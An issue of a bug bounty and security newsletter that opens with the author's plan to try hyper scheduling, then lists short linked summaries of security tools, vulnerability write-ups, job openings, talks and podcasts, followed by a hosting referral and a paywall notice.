- Hive Five
- Posts
- π Hive Five 44 β Hyper scheduling
π Hive Five 44 β Hyper scheduling
Photo by Matthew Smith / Unsplash
Hi friends,
Greetings from the hive!
I hope you had a fruitful week and a relaxing weekend. While listening to one of my weekly podcasts, I heard about time blocking or hyper scheduling.
Having seen it mentioned before, I've decided to implement it. Coincidentally, I received an invite to the next-gen calendar called cron. So it seems that the universe is with me on this one.
What new things are you trying out?
Let's take this week by swarm!
π The Bee's Knees
We Know Which Private Keys Are Bad: Asymmetric private keys are among the most often leaked out. A new open source tool driftwood will immediately tell you if one is sensitive. Read full blog post.
Advice for young hackers. Getting started in cybersecurity: In this video, they talk about their journey in cybersecurity, how they learned their skills, and what newcomers can do to get started.
honoki/bugbounty-openvpn-socks: This project uses Docker to run multiple VPN tunnels simultaneously from the same machine, and exposes a SOCKS proxy for each separate VPN connection. If you are using tools without built-in proxy support, you can use proxychains to force everything through the proxy regardless.
ChaosDB Explained - Azure's Cosmos DB Vulnerability Walkthrough: This is the full story of the Azure ChaosDB Vulnerability that was discovered and disclosed by the Wiz Research Team, where they were able to gain complete unrestricted access to the databases of several thousand Microsoft Azure customers.
Secondary Contexts by 0xAwali: A collection of over 100 different examples of secondary context related vulnerabilities in web applications.
Get $100 to try DigitalOcean. The go-to VPS for bug bounty hunters. I use it for all of my own recon and automation needs, plus it also doubles as a VPN. They have every cloud resource you need at an affordable price.
π₯ Buzzworthy
β Changelog
New Release - FullHunt Public API: FullHunt is releasing a public API to find all attack surfaces, exposed services, DNS records, subdomains, and public assets for free.
Three new PentesterLab videos: Covering the code review of PHP snippet #01, #02 and #03.
Corben Leo rewrote gau: This includes speed improvements, a new provider (urlscan), loading options from configuration files, new filter support, socks5 proxy support, and more.
π Events
spaceraccoon is co-organizing a Bug Bounty Quarter: @kickino will speak about "Report Medley β What Makes a Bug Report Great?".
π Celebrate
Josh got a $10k bounty from Microsoft: Let's go!
It was STΓK's birthday: Happy birthday!
Luke celebrates Katie: Awesome!
Ankit received another bounty: Keep it up!
Mustafa found an interesting SQLi: Amazing!
π° Career Corner
ca$s:e cage is hiring (remote): Third Party Risk Analyst, Assurance Analyst, Compliance Analyst, Program Manager Policies & Procedures, and Program Manager Security Awareness.
Bishop Fox is hiring (remote US): Just opened up 2 positions on our Cosmos team: Sr Attack Surface Intelligence(ASI) Analyst and Sr Adversarial Operator.
Sera sharing her journey: From highschool dropout to senior seceng.
Rachel Tobac sharing her journey: My job path to get to this was so non linear itβs interesting to look back β neuroscience and behavior research to rat lab to teaching to UX research to hacking.
π° Articles
Practical Security Recommendations for Start-ups with Limited Budgets.
Exploiting CSP in Webkit to Break Authentication & Authorization: When it comes to the web, browsers are the first line of defense.
IDOR through MongoDB Object IDs Prediction: This post assumes that you have a fair understanding of what an IDOR is.
Simple SSRF Allows Access To Internal Assets: While taking a look at one of the host targets at Synack everything seemed to be a dead end as two hosts were only available on scope, and one of them was hosting a web server.
π Resources
hakluke on Burp usage (replies): Find out where people spent the majority of their time in Burp.
All about bug bounty: These are bug bounty notes that they have gathered from various sources, you can contribute to this repository too.
Useful sed scripts: This was born in 4-5 hours of recapping sed (and many hours learning it in the first place).
Sysmon Cheatsheet: All sysmon event types and their fields explained.
Awesome Web Archiving: An Awesome List for getting started with web archiving.
π₯ Videos
Isabelle Mauny API security talk with We Hack Purple: Isabelle Mauny of 42Crunch fame talks about API security as well as demonstrates APIsecurity.io with Tanya Janca and We hack Purple.
Staying sane in bug bounties: zseano's talk for Ekoparty Security Conference.
BountyTraining - Getting a feel for your target with BugBountyHunter: What does it mean to actually to "get a feel for things"?
I quit my IT job for YouTube and bounty - bounty vlog #0: Series on their bounty journey with all the details, like time spent and money earned.
π΅ Audio
STΓK tells us to listen to TOOL: I wholeheartedly agree. While you're at it check out this video of their drummer Danny Carey.
The Next Generation of Hackers with Deviant Ollam: In episode three of Hacker Valley Red, Chris and Ron are joined by Deviant Ollam, a hacker to the bone and one of Chrisβ inspirations in security.
Focused - Hyper-Scheduling Revisited: Mike and David return to the subject of hyper-scheduling after they've both been at it a few years.
Get $100 to try DigitalOcean - The go-to VPS for bug bounty hunters. I use it for all of my own recon and automation needs, plus it also doubles as a VPN. They have every cloud resource you need at an affordable price.
Subscribe to Premium to read the rest.
Become a paying subscriber of Premium to get access to this post and other subscriber-only content.
Already a paying subscriber? Sign In.
A subscription gets you:
- β’ Join a private Discord COMMUNITY: Engage in chat, uplift one another, grow together, and explore shared interests.
- β’ Access to COMPLETE HIVE ARCHIVE: Unlock a treasure trove of tools, resources, videos, and audio, catering to all your needs.
- β’ EXCLUSIVE & BONUS content: Delve into hundreds of curated links that didn't make it into the newsletter.
- β’ MEMBER-ONLY events: Take part in digital meetups, focus sessions, and more.
- β’ Deep DISCOUNTS on paid content.
- β’ Experience continuously added NEW BENEFITS.